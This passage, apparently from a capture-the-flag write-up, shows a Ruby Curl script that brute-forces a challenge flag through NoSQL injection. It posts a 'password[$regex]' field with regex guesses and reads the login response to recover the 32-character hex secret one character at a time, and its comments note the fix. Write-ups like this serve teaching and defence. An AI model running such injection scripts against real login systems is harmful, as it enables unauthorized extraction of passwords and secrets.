Each bad request results in an authentication failure, and when the right character is found with a successful authentication, the script will try to find the next characters with something like:
# One Curl handle is reused for every request: it carries the session cookie
# and the fixed headers below, so later posts ride on the same session.
c = Curl::Easy.new(hostname) do |curl|
  {
    'Cookie' => 'session=mySessionCookie',
    'Referer' => hostname,
    'Host' => 'challenge-ecw.fr',
    'Connection' => 'keep-alive',
    'Upgrade-Insecure-Requests' => '1'
  }.each { |name, value| curl.headers[name] = value }
  # curl.verbose = true
end
c.perform # send the request
# Sanity check: the initial page is reachable before the guessing loop starts.
puts '• Connexion to ECW works' if c.body_str.match(/Un nouveau m/)
# Expected password length: 32 hex characters, i.e. an MD5 digest (md5(hash)).
length = 32
# Recover the password one character at a time.
# The parameter name `password[$regex]` nests a `$regex` operator under the
# password field; the server evidently evaluates it (presumably a MongoDB-style
# query built straight from the decoded form hash), which is what lets the
# response distinguish a partial match. The defence is to coerce `password` to
# a plain string (or reject `$`-prefixed keys) before it reaches the query.
answer = ""
ECW_flag_alphabet_array = ('a'..'f').to_a + ('0'..'9').to_a # md5(hash)
(1..length).each do |offset|
  remaining = length - offset
  found = ECW_flag_alphabet_array.find do |char|
    candidate = "ECW{#{answer}#{char}.{#{remaining}}}"
    c.http_post(Curl::PostField.content('password[$regex]', candidate),
                Curl::PostField.content('nonce', nonce))
    c.perform
    hit = c.body_str.match(/Authentification valide\. Le mot de passe est le flag\./)
    puts "Tried: ECW{#{answer}#{char}}" unless hit
    hit
  end
  # No alphabet character matched at this position: move on, as the original did.
  next unless found
  answer.concat(found)
  puts "Password: ECW{#{answer}}"
end